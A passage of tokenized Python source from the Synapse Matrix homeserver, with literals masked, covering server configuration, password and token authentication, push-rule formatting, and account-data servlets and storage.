unsecure_port ) <EOL> else : <EOL> host = host . split ( '<STR_LIT::>' ) [ <NUM_LIT:0> ] <EOL> host = "<STR_LIT>" % ( host , unsecure_port ) <EOL> content_addr = "<STR_LIT>" % ( host , ) <EOL> self . content_addr = content_addr <EOL> def default_config ( self , server_name , ** kwargs ) : <EOL> if "<STR_LIT::>" in server_name : <EOL> bind_port = int ( server_name . split ( "<STR_LIT::>" ) [ <NUM_LIT:1> ] ) <EOL> unsecure_port = bind_port - <NUM_LIT> <EOL> else : <EOL> bind_port = <NUM_LIT> <EOL> unsecure_port = <NUM_LIT> <EOL> pid_file = self . abspath ( "<STR_LIT>" ) <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def read_arguments ( self , args ) : <EOL> if args . manhole is not None : <EOL> self . manhole = args . manhole <EOL> if args . daemonize is not None : <EOL> self . daemonize = args . daemonize <EOL> if args . print_pidfile is not None : <EOL> self . print_pidfile = args . print_pidfile <EOL> def add_arguments ( self , parser ) : <EOL> server_group = parser . 
add_argument_group ( "<STR_LIT>" ) <EOL> server_group . add_argument ( "<STR_LIT>" , "<STR_LIT>" , action = '<STR_LIT:store_true>' , <EOL> default = None , <EOL> help = "<STR_LIT>" ) <EOL> server_group . add_argument ( "<STR_LIT>" , action = '<STR_LIT:store_true>' , <EOL> default = None , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> server_group . add_argument ( "<STR_LIT>" , metavar = "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> type = int , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) </s>
<s> from twisted . internet import defer <EOL> from . _base import BaseHandler <EOL> from synapse . api . constants import LoginType <EOL> from synapse . types import UserID <EOL> from synapse . api . errors import AuthError , LoginError , Codes <EOL> from synapse . util . async import run_on_reactor <EOL> from twisted . web . client import PartialDownloadError <EOL> import logging <EOL> import bcrypt <EOL> import pymacaroons <EOL> import simplejson <EOL> import synapse . util . stringutils as stringutils <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AuthHandler ( BaseHandler ) : <EOL> SESSION_EXPIRE_MS = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:1000> <EOL> def __init__ ( self , hs ) : <EOL> super ( AuthHandler , self ) . __init__ ( hs ) <EOL> self . checkers = { <EOL> LoginType . PASSWORD : self . _check_password_auth , <EOL> LoginType . RECAPTCHA : self . _check_recaptcha , <EOL> LoginType . EMAIL_IDENTITY : self . _check_email_identity , <EOL> LoginType . DUMMY : self . _check_dummy_auth , <EOL> } <EOL> self . bcrypt_rounds = hs . config . bcrypt_rounds <EOL> self . sessions = { } <EOL> self . INVALID_TOKEN_HTTP_STATUS = <NUM_LIT> <EOL> @ defer . inlineCallbacks <EOL> def check_auth ( self , flows , clientdict , clientip ) : <EOL> """<STR_LIT>""" <EOL> authdict = None <EOL> sid = None <EOL> if clientdict and '<STR_LIT>' in clientdict : <EOL> authdict = clientdict [ '<STR_LIT>' ] <EOL> del clientdict [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in authdict : <EOL> sid = authdict [ '<STR_LIT>' ] <EOL> session = self . _get_session_info ( sid ) <EOL> if len ( clientdict ) > <NUM_LIT:0> : <EOL> session [ '<STR_LIT>' ] = clientdict <EOL> self . _save_session ( session ) <EOL> elif '<STR_LIT>' in session : <EOL> clientdict = session [ '<STR_LIT>' ] <EOL> if not authdict : <EOL> defer . returnValue ( <EOL> ( <EOL> False , self . 
_auth_dict_for_flows ( flows , session ) , <EOL> clientdict , session [ '<STR_LIT:id>' ] <EOL> ) <EOL> ) <EOL> if '<STR_LIT>' not in session : <EOL> session [ '<STR_LIT>' ] = { } <EOL> creds = session [ '<STR_LIT>' ] <EOL> if '<STR_LIT:type>' in authdict : <EOL> if authdict [ '<STR_LIT:type>' ] not in self . checkers : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . UNRECOGNIZED ) <EOL> result = yield self . checkers [ authdict [ '<STR_LIT:type>' ] ] ( authdict , clientip ) <EOL> if result : <EOL> creds [ authdict [ '<STR_LIT:type>' ] ] = result <EOL> self . _save_session ( session ) <EOL> for f in flows : <EOL> if len ( set ( f ) - set ( creds . keys ( ) ) ) == <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" , creds ) <EOL> defer . returnValue ( ( True , creds , clientdict , session [ '<STR_LIT:id>' ] ) ) <EOL> ret = self . _auth_dict_for_flows ( flows , session ) <EOL> ret [ '<STR_LIT>' ] = creds . keys ( ) <EOL> defer . returnValue ( ( False , ret , clientdict , session [ '<STR_LIT:id>' ] ) ) <EOL> @ defer . inlineCallbacks <EOL> def add_oob_auth ( self , stagetype , authdict , clientip ) : <EOL> """<STR_LIT>""" <EOL> if stagetype not in self . checkers : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> if '<STR_LIT>' not in authdict : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> sess = self . _get_session_info ( <EOL> authdict [ '<STR_LIT>' ] <EOL> ) <EOL> if '<STR_LIT>' not in sess : <EOL> sess [ '<STR_LIT>' ] = { } <EOL> creds = sess [ '<STR_LIT>' ] <EOL> result = yield self . checkers [ stagetype ] ( authdict , clientip ) <EOL> if result : <EOL> creds [ stagetype ] = result <EOL> self . _save_session ( sess ) <EOL> defer . returnValue ( True ) <EOL> defer . 
returnValue ( False ) <EOL> def get_session_id ( self , clientdict ) : <EOL> """<STR_LIT>""" <EOL> sid = None <EOL> if clientdict and '<STR_LIT>' in clientdict : <EOL> authdict = clientdict [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in authdict : <EOL> sid = authdict [ '<STR_LIT>' ] <EOL> return sid <EOL> def set_session_data ( self , session_id , key , value ) : <EOL> """<STR_LIT>""" <EOL> sess = self . _get_session_info ( session_id ) <EOL> sess . setdefault ( '<STR_LIT>' , { } ) [ key ] = value <EOL> self . _save_session ( sess ) <EOL> def get_session_data ( self , session_id , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> sess = self . _get_session_info ( session_id ) <EOL> return sess . setdefault ( '<STR_LIT>' , { } ) . get ( key , default ) <EOL> @ defer . inlineCallbacks <EOL> def _check_password_auth ( self , authdict , _ ) : <EOL> if "<STR_LIT:user>" not in authdict or "<STR_LIT:password>" not in authdict : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> user_id = authdict [ "<STR_LIT:user>" ] <EOL> password = authdict [ "<STR_LIT:password>" ] <EOL> if not user_id . startswith ( '<STR_LIT:@>' ) : <EOL> user_id = UserID . create ( user_id , self . hs . hostname ) . to_string ( ) <EOL> user_id , password_hash = yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> self . _check_password ( user_id , password , password_hash ) <EOL> defer . returnValue ( user_id ) <EOL> @ defer . inlineCallbacks <EOL> def _check_recaptcha ( self , authdict , clientip ) : <EOL> try : <EOL> user_response = authdict [ "<STR_LIT>" ] <EOL> except KeyError : <EOL> raise LoginError ( <EOL> <NUM_LIT> , "<STR_LIT>" , <EOL> errcode = Codes . CAPTCHA_NEEDED <EOL> ) <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> user_response , clientip <EOL> ) <EOL> try : <EOL> client = self . hs . get_simple_http_client ( ) <EOL> resp_body = yield client . post_urlencoded_get_json ( <EOL> self . hs . config . 
recaptcha_siteverify_api , <EOL> args = { <EOL> '<STR_LIT>' : self . hs . config . recaptcha_private_key , <EOL> '<STR_LIT>' : user_response , <EOL> '<STR_LIT>' : clientip , <EOL> } <EOL> ) <EOL> except PartialDownloadError as pde : <EOL> data = pde . response <EOL> resp_body = simplejson . loads ( data ) <EOL> if '<STR_LIT:success>' in resp_body and resp_body [ '<STR_LIT:success>' ] : <EOL> defer . returnValue ( True ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . UNAUTHORIZED ) <EOL> @ defer . inlineCallbacks <EOL> def _check_email_identity ( self , authdict , _ ) : <EOL> yield run_on_reactor ( ) <EOL> if '<STR_LIT>' not in authdict : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , Codes . MISSING_PARAM ) <EOL> threepid_creds = authdict [ '<STR_LIT>' ] <EOL> identity_handler = self . hs . get_handlers ( ) . identity_handler <EOL> logger . info ( "<STR_LIT>" % ( threepid_creds , ) ) <EOL> threepid = yield identity_handler . threepid_from_creds ( threepid_creds ) <EOL> if not threepid : <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . UNAUTHORIZED ) <EOL> threepid [ '<STR_LIT>' ] = authdict [ '<STR_LIT>' ] <EOL> defer . returnValue ( threepid ) <EOL> @ defer . inlineCallbacks <EOL> def _check_dummy_auth ( self , authdict , _ ) : <EOL> yield run_on_reactor ( ) <EOL> defer . returnValue ( True ) <EOL> def _get_params_recaptcha ( self ) : <EOL> return { "<STR_LIT>" : self . hs . config . recaptcha_public_key } <EOL> def _auth_dict_for_flows ( self , flows , session ) : <EOL> public_flows = [ ] <EOL> for f in flows : <EOL> public_flows . append ( f ) <EOL> get_params = { <EOL> LoginType . RECAPTCHA : self . 
_get_params_recaptcha , <EOL> } <EOL> params = { } <EOL> for f in public_flows : <EOL> for stage in f : <EOL> if stage in get_params and stage not in params : <EOL> params [ stage ] = get_params [ stage ] ( ) <EOL> return { <EOL> "<STR_LIT>" : session [ '<STR_LIT:id>' ] , <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : f } for f in public_flows ] , <EOL> "<STR_LIT>" : params <EOL> } <EOL> def _get_session_info ( self , session_id ) : <EOL> if session_id not in self . sessions : <EOL> session_id = None <EOL> if not session_id : <EOL> while session_id is None or session_id in self . sessions : <EOL> session_id = stringutils . random_string ( <NUM_LIT> ) <EOL> self . sessions [ session_id ] = { <EOL> "<STR_LIT:id>" : session_id , <EOL> } <EOL> return self . sessions [ session_id ] <EOL> @ defer . inlineCallbacks <EOL> def login_with_password ( self , user_id , password ) : <EOL> """<STR_LIT>""" <EOL> user_id , password_hash = yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> self . _check_password ( user_id , password , password_hash ) <EOL> logger . info ( "<STR_LIT>" , user_id ) <EOL> access_token = yield self . issue_access_token ( user_id ) <EOL> refresh_token = yield self . issue_refresh_token ( user_id ) <EOL> defer . returnValue ( ( user_id , access_token , refresh_token ) ) <EOL> @ defer . inlineCallbacks <EOL> def get_login_tuple_for_user_id ( self , user_id ) : <EOL> """<STR_LIT>""" <EOL> user_id , ignored = yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> logger . info ( "<STR_LIT>" , user_id ) <EOL> access_token = yield self . issue_access_token ( user_id ) <EOL> refresh_token = yield self . issue_refresh_token ( user_id ) <EOL> defer . returnValue ( ( user_id , access_token , refresh_token ) ) <EOL> @ defer . inlineCallbacks <EOL> def does_user_exist ( self , user_id ) : <EOL> try : <EOL> yield self . _find_user_id_and_pwd_hash ( user_id ) <EOL> defer . returnValue ( True ) <EOL> except LoginError : <EOL> defer . 
returnValue ( False ) <EOL> @ defer . inlineCallbacks <EOL> def _find_user_id_and_pwd_hash ( self , user_id ) : <EOL> """<STR_LIT>""" <EOL> user_infos = yield self . store . get_users_by_id_case_insensitive ( user_id ) <EOL> if not user_infos : <EOL> logger . warn ( "<STR_LIT>" , user_id ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . FORBIDDEN ) <EOL> if len ( user_infos ) > <NUM_LIT:1> : <EOL> if user_id not in user_infos : <EOL> logger . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> user_id , user_infos . keys ( ) <EOL> ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . FORBIDDEN ) <EOL> defer . returnValue ( ( user_id , user_infos [ user_id ] ) ) <EOL> else : <EOL> defer . returnValue ( user_infos . popitem ( ) ) <EOL> def _check_password ( self , user_id , password , stored_hash ) : <EOL> """<STR_LIT>""" <EOL> if not self . validate_hash ( password , stored_hash ) : <EOL> logger . warn ( "<STR_LIT>" , user_id ) <EOL> raise LoginError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . FORBIDDEN ) <EOL> @ defer . inlineCallbacks <EOL> def issue_access_token ( self , user_id ) : <EOL> access_token = self . generate_access_token ( user_id ) <EOL> yield self . store . add_access_token_to_user ( user_id , access_token ) <EOL> defer . returnValue ( access_token ) <EOL> @ defer . inlineCallbacks <EOL> def issue_refresh_token ( self , user_id ) : <EOL> refresh_token = self . generate_refresh_token ( user_id ) <EOL> yield self . store . add_refresh_token_to_user ( user_id , refresh_token ) <EOL> defer . returnValue ( refresh_token ) <EOL> def generate_access_token ( self , user_id , extra_caveats = None ) : <EOL> extra_caveats = extra_caveats or [ ] <EOL> macaroon = self . _generate_base_macaroon ( user_id ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" ) <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> expiry = now + ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT:1000> ) <EOL> macaroon . 
add_first_party_caveat ( "<STR_LIT>" % ( expiry , ) ) <EOL> for caveat in extra_caveats : <EOL> macaroon . add_first_party_caveat ( caveat ) <EOL> return macaroon . serialize ( ) <EOL> def generate_refresh_token ( self , user_id ) : <EOL> m = self . _generate_base_macaroon ( user_id ) <EOL> m . add_first_party_caveat ( "<STR_LIT>" ) <EOL> m . add_first_party_caveat ( "<STR_LIT>" % ( <EOL> stringutils . random_string_with_symbols ( <NUM_LIT:16> ) , <EOL> ) ) <EOL> return m . serialize ( ) <EOL> def generate_short_term_login_token ( self , user_id ) : <EOL> macaroon = self . _generate_base_macaroon ( user_id ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" ) <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> expiry = now + ( <NUM_LIT:2> * <NUM_LIT> * <NUM_LIT:1000> ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" % ( expiry , ) ) <EOL> return macaroon . serialize ( ) <EOL> def validate_short_term_login_token_and_get_user_id ( self , login_token ) : <EOL> try : <EOL> macaroon = pymacaroons . Macaroon . deserialize ( login_token ) <EOL> auth_api = self . hs . get_auth ( ) <EOL> auth_api . validate_macaroon ( macaroon , "<STR_LIT>" , True ) <EOL> return self . get_user_from_macaroon ( macaroon ) <EOL> except ( pymacaroons . exceptions . MacaroonException , TypeError , ValueError ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" , errcode = Codes . UNKNOWN_TOKEN ) <EOL> def _generate_base_macaroon ( self , user_id ) : <EOL> macaroon = pymacaroons . Macaroon ( <EOL> location = self . hs . config . server_name , <EOL> identifier = "<STR_LIT:key>" , <EOL> key = self . hs . config . macaroon_secret_key ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" ) <EOL> macaroon . add_first_party_caveat ( "<STR_LIT>" % ( user_id , ) ) <EOL> return macaroon <EOL> def get_user_from_macaroon ( self , macaroon ) : <EOL> user_prefix = "<STR_LIT>" <EOL> for caveat in macaroon . caveats : <EOL> if caveat . caveat_id . 
startswith ( user_prefix ) : <EOL> return caveat . caveat_id [ len ( user_prefix ) : ] <EOL> raise AuthError ( <EOL> self . INVALID_TOKEN_HTTP_STATUS , "<STR_LIT>" , <EOL> errcode = Codes . UNKNOWN_TOKEN <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def set_password ( self , user_id , newpassword , requester = None ) : <EOL> password_hash = self . hash ( newpassword ) <EOL> except_access_token_ids = [ requester . access_token_id ] if requester else [ ] <EOL> yield self . store . user_set_password_hash ( user_id , password_hash ) <EOL> yield self . store . user_delete_access_tokens ( <EOL> user_id , except_access_token_ids <EOL> ) <EOL> yield self . hs . get_pusherpool ( ) . remove_pushers_by_user ( <EOL> user_id , except_access_token_ids <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def add_threepid ( self , user_id , medium , address , validated_at ) : <EOL> yield self . store . user_add_threepid ( <EOL> user_id , medium , address , validated_at , <EOL> self . hs . get_clock ( ) . time_msec ( ) <EOL> ) <EOL> def _save_session ( self , session ) : <EOL> logger . debug ( "<STR_LIT>" , session ) <EOL> session [ "<STR_LIT>" ] = self . hs . get_clock ( ) . time_msec ( ) <EOL> self . sessions [ session [ "<STR_LIT:id>" ] ] = session <EOL> self . _prune_sessions ( ) <EOL> def _prune_sessions ( self ) : <EOL> for sid , sess in self . sessions . items ( ) : <EOL> last_used = <NUM_LIT:0> <EOL> if '<STR_LIT>' in sess : <EOL> last_used = sess [ '<STR_LIT>' ] <EOL> now = self . hs . get_clock ( ) . time_msec ( ) <EOL> if last_used < now - AuthHandler . SESSION_EXPIRE_MS : <EOL> del self . sessions [ sid ] <EOL> def hash ( self , password ) : <EOL> """<STR_LIT>""" <EOL> return bcrypt . hashpw ( password , bcrypt . gensalt ( self . bcrypt_rounds ) ) <EOL> def validate_hash ( self , password , stored_hash ) : <EOL> """<STR_LIT>""" <EOL> return bcrypt . hashpw ( password , stored_hash ) == stored_hash </s>
<s> from synapse . push . baserules import list_with_base_rules <EOL> from synapse . push . rulekinds import ( <EOL> PRIORITY_CLASS_MAP , PRIORITY_CLASS_INVERSE_MAP <EOL> ) <EOL> import copy <EOL> import simplejson as json <EOL> def format_push_rules_for_user ( user , rawrules , enabled_map ) : <EOL> """<STR_LIT>""" <EOL> ruleslist = [ ] <EOL> for rawrule in rawrules : <EOL> rule = dict ( rawrule ) <EOL> rule [ "<STR_LIT>" ] = json . loads ( rawrule [ "<STR_LIT>" ] ) <EOL> rule [ "<STR_LIT>" ] = json . loads ( rawrule [ "<STR_LIT>" ] ) <EOL> ruleslist . append ( rule ) <EOL> ruleslist = copy . deepcopy ( list_with_base_rules ( ruleslist ) ) <EOL> rules = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> rules [ '<STR_LIT>' ] = _add_empty_priority_class_arrays ( rules [ '<STR_LIT>' ] ) <EOL> for r in ruleslist : <EOL> rulearray = None <EOL> template_name = _priority_class_to_template_name ( r [ '<STR_LIT>' ] ) <EOL> for c in r [ "<STR_LIT>" ] : <EOL> c . pop ( "<STR_LIT>" , None ) <EOL> pattern_type = c . pop ( "<STR_LIT>" , None ) <EOL> if pattern_type == "<STR_LIT>" : <EOL> c [ "<STR_LIT>" ] = user . to_string ( ) <EOL> elif pattern_type == "<STR_LIT>" : <EOL> c [ "<STR_LIT>" ] = user . localpart <EOL> rulearray = rules [ '<STR_LIT>' ] [ template_name ] <EOL> template_rule = _rule_to_template ( r ) <EOL> if template_rule : <EOL> if r [ '<STR_LIT>' ] in enabled_map : <EOL> template_rule [ '<STR_LIT>' ] = enabled_map [ r [ '<STR_LIT>' ] ] <EOL> elif '<STR_LIT>' in r : <EOL> template_rule [ '<STR_LIT>' ] = r [ '<STR_LIT>' ] <EOL> else : <EOL> template_rule [ '<STR_LIT>' ] = True <EOL> rulearray . append ( template_rule ) <EOL> return rules <EOL> def _add_empty_priority_class_arrays ( d ) : <EOL> for pc in PRIORITY_CLASS_MAP . 
keys ( ) : <EOL> d [ pc ] = [ ] <EOL> return d <EOL> def _rule_to_template ( rule ) : <EOL> unscoped_rule_id = None <EOL> if '<STR_LIT>' in rule : <EOL> unscoped_rule_id = _rule_id_from_namespaced ( rule [ '<STR_LIT>' ] ) <EOL> template_name = _priority_class_to_template_name ( rule [ '<STR_LIT>' ] ) <EOL> if template_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> templaterule = { k : rule [ k ] for k in [ "<STR_LIT>" , "<STR_LIT>" ] } <EOL> elif template_name in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> templaterule = { '<STR_LIT>' : rule [ '<STR_LIT>' ] } <EOL> unscoped_rule_id = rule [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> elif template_name == '<STR_LIT:content>' : <EOL> if len ( rule [ "<STR_LIT>" ] ) != <NUM_LIT:1> : <EOL> return None <EOL> thecond = rule [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> if "<STR_LIT>" not in thecond : <EOL> return None <EOL> templaterule = { '<STR_LIT>' : rule [ '<STR_LIT>' ] } <EOL> templaterule [ "<STR_LIT>" ] = thecond [ "<STR_LIT>" ] <EOL> if unscoped_rule_id : <EOL> templaterule [ '<STR_LIT>' ] = unscoped_rule_id <EOL> if '<STR_LIT:default>' in rule : <EOL> templaterule [ '<STR_LIT:default>' ] = rule [ '<STR_LIT:default>' ] <EOL> return templaterule <EOL> def _rule_id_from_namespaced ( in_rule_id ) : <EOL> return in_rule_id . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> def _priority_class_to_template_name ( pc ) : <EOL> return PRIORITY_CLASS_INVERSE_MAP [ pc ] </s>
<s> from . _base import client_v2_patterns <EOL> from synapse . http . servlet import RestServlet , parse_json_object_from_request <EOL> from synapse . api . errors import AuthError <EOL> from twisted . internet import defer <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AccountDataServlet ( RestServlet ) : <EOL> """<STR_LIT>""" <EOL> PATTERNS = client_v2_patterns ( <EOL> "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self , hs ) : <EOL> super ( AccountDataServlet , self ) . __init__ ( ) <EOL> self . auth = hs . get_auth ( ) <EOL> self . store = hs . get_datastore ( ) <EOL> self . notifier = hs . get_notifier ( ) <EOL> @ defer . inlineCallbacks <EOL> def on_PUT ( self , request , user_id , account_data_type ) : <EOL> requester = yield self . auth . get_user_by_req ( request ) <EOL> if user_id != requester . user . to_string ( ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> body = parse_json_object_from_request ( request ) <EOL> max_id = yield self . store . add_account_data_for_user ( <EOL> user_id , account_data_type , body <EOL> ) <EOL> self . notifier . on_new_event ( <EOL> "<STR_LIT>" , max_id , users = [ user_id ] <EOL> ) <EOL> defer . returnValue ( ( <NUM_LIT:200> , { } ) ) <EOL> class RoomAccountDataServlet ( RestServlet ) : <EOL> """<STR_LIT>""" <EOL> PATTERNS = client_v2_patterns ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self , hs ) : <EOL> super ( RoomAccountDataServlet , self ) . __init__ ( ) <EOL> self . auth = hs . get_auth ( ) <EOL> self . store = hs . get_datastore ( ) <EOL> self . notifier = hs . get_notifier ( ) <EOL> @ defer . inlineCallbacks <EOL> def on_PUT ( self , request , user_id , room_id , account_data_type ) : <EOL> requester = yield self . auth . get_user_by_req ( request ) <EOL> if user_id != requester . user . 
to_string ( ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> body = parse_json_object_from_request ( request ) <EOL> max_id = yield self . store . add_account_data_to_room ( <EOL> user_id , room_id , account_data_type , body <EOL> ) <EOL> self . notifier . on_new_event ( <EOL> "<STR_LIT>" , max_id , users = [ user_id ] <EOL> ) <EOL> defer . returnValue ( ( <NUM_LIT:200> , { } ) ) <EOL> def register_servlets ( hs , http_server ) : <EOL> AccountDataServlet ( hs ) . register ( http_server ) <EOL> RoomAccountDataServlet ( hs ) . register ( http_server ) </s>
<s> from . _base import SQLBaseStore <EOL> from twisted . internet import defer <EOL> import ujson as json <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class AccountDataStore ( SQLBaseStore ) : <EOL> def get_account_data_for_user ( self , user_id ) : <EOL> """<STR_LIT>""" <EOL> def get_account_data_for_user_txn ( txn ) : <EOL> rows = self . _simple_select_list_txn ( <EOL> txn , "<STR_LIT>" , { "<STR_LIT>" : user_id } , <EOL> [ "<STR_LIT>" , "<STR_LIT:content>" ] <EOL> ) <EOL> global_account_data = { <EOL> row [ "<STR_LIT>" ] : json . loads ( row [ "<STR_LIT:content>" ] ) for row in rows <EOL> } <EOL> rows = self . _simple_select_list_txn ( <EOL> txn , "<STR_LIT>" , { "<STR_LIT>" : user_id } , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:content>" ] <EOL> ) <EOL> by_room = { } <EOL> for row in rows : <EOL> room_data = by_room . setdefault ( row [ "<STR_LIT>" ] , { } ) <EOL> room_data [ row [ "<STR_LIT>" ] ] = json . loads ( row [ "<STR_LIT:content>" ] ) <EOL> return ( global_account_data , by_room ) <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_account_data_for_user_txn <EOL> ) <EOL> def get_account_data_for_room ( self , user_id , room_id ) : <EOL> """<STR_LIT>""" <EOL> def get_account_data_for_room_txn ( txn ) : <EOL> rows = self . _simple_select_list_txn ( <EOL> txn , "<STR_LIT>" , { "<STR_LIT>" : user_id , "<STR_LIT>" : room_id } , <EOL> [ "<STR_LIT>" , "<STR_LIT:content>" ] <EOL> ) <EOL> return { <EOL> row [ "<STR_LIT>" ] : json . loads ( row [ "<STR_LIT:content>" ] ) for row in rows <EOL> } <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_account_data_for_room_txn <EOL> ) <EOL> def get_all_updated_account_data ( self , last_global_id , last_room_id , <EOL> current_id , limit ) : <EOL> """<STR_LIT>""" <EOL> def get_updated_account_data_txn ( txn ) : <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . 
execute ( sql , ( last_global_id , current_id , limit ) ) <EOL> global_results = txn . fetchall ( ) <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( last_room_id , current_id , limit ) ) <EOL> room_results = txn . fetchall ( ) <EOL> return ( global_results , room_results ) <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_updated_account_data_txn <EOL> ) <EOL> def get_updated_account_data_for_user ( self , user_id , stream_id ) : <EOL> """<STR_LIT>""" <EOL> def get_updated_account_data_for_user_txn ( txn ) : <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( user_id , stream_id ) ) <EOL> global_account_data = { <EOL> row [ <NUM_LIT:0> ] : json . loads ( row [ <NUM_LIT:1> ] ) for row in txn . fetchall ( ) <EOL> } <EOL> sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( sql , ( user_id , stream_id ) ) <EOL> account_data_by_room = { } <EOL> for row in txn . fetchall ( ) : <EOL> room_account_data = account_data_by_room . setdefault ( row [ <NUM_LIT:0> ] , { } ) <EOL> room_account_data [ row [ <NUM_LIT:1> ] ] = json . loads ( row [ <NUM_LIT:2> ] ) <EOL> return ( global_account_data , account_data_by_room ) <EOL> changed = self . _account_data_stream_cache . has_entity_changed ( <EOL> user_id , int ( stream_id ) <EOL> ) <EOL> if not changed : <EOL> return ( { } , { } ) <EOL> return self . runInteraction ( <EOL> "<STR_LIT>" , get_updated_account_data_for_user_txn <EOL> ) <EOL> @ defer . inlineCallbacks <EOL> def add_account_data_to_room ( self , user_id , room_id , account_data_type , content ) : <EOL> """<STR_LIT>""" <EOL> content_json = json . dumps ( content ) <EOL> def add_account_data_txn ( txn , next_id ) : <EOL> self . 
_simple_upsert_txn ( <EOL> txn , <EOL> table = "<STR_LIT>" , <EOL> keyvalues = { <EOL> "<STR_LIT>" : user_id , <EOL> "<STR_LIT>" : room_id , <EOL> "<STR_LIT>" : account_data_type , <EOL> } , <EOL> values = { <EOL> "<STR_LIT>" : next_id , <EOL> "<STR_LIT:content>" : content_json , <EOL> } <EOL> ) <EOL> txn . call_after ( <EOL> self . _account_data_stream_cache . entity_has_changed , <EOL> user_id , next_id , <EOL> ) <EOL> self . _update_max_stream_id ( txn , next_id ) <EOL> with self . _account_data_id_gen . get_next ( ) as next_id : <EOL> yield self . runInteraction ( <EOL> "<STR_LIT>" , add_account_data_txn , next_id <EOL> ) <EOL> result = self . _account_data_id_gen . get_max_token ( ) <EOL> defer . returnValue ( result ) <EOL> @ defer . inlineCallbacks <EOL> def add_account_data_for_user ( self , user_id , account_data_type , content ) : <EOL> """<STR_LIT>""" <EOL> content_json = json . dumps ( content ) <EOL> def add_account_data_txn ( txn , next_id ) : <EOL> self . _simple_upsert_txn ( <EOL> txn , <EOL> table = "<STR_LIT>" , <EOL> keyvalues = { <EOL> "<STR_LIT>" : user_id , <EOL> "<STR_LIT>" : account_data_type , <EOL> } , <EOL> values = { <EOL> "<STR_LIT>" : next_id , <EOL> "<STR_LIT:content>" : content_json , <EOL> } <EOL> ) <EOL> txn . call_after ( <EOL> self . _account_data_stream_cache . entity_has_changed , <EOL> user_id , next_id , <EOL> ) <EOL> self . _update_max_stream_id ( txn , next_id ) <EOL> with self . _account_data_id_gen . get_next ( ) as next_id : <EOL> yield self . runInteraction ( <EOL> "<STR_LIT>" , add_account_data_txn , next_id <EOL> ) <EOL> result = self . _account_data_id_gen . get_max_token ( ) <EOL> defer . returnValue ( result ) <EOL> def _update_max_stream_id ( self , txn , next_id ) : <EOL> """<STR_LIT>""" <EOL> update_max_id_sql = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> txn . execute ( update_max_id_sql , ( next_id , next_id ) ) </s>
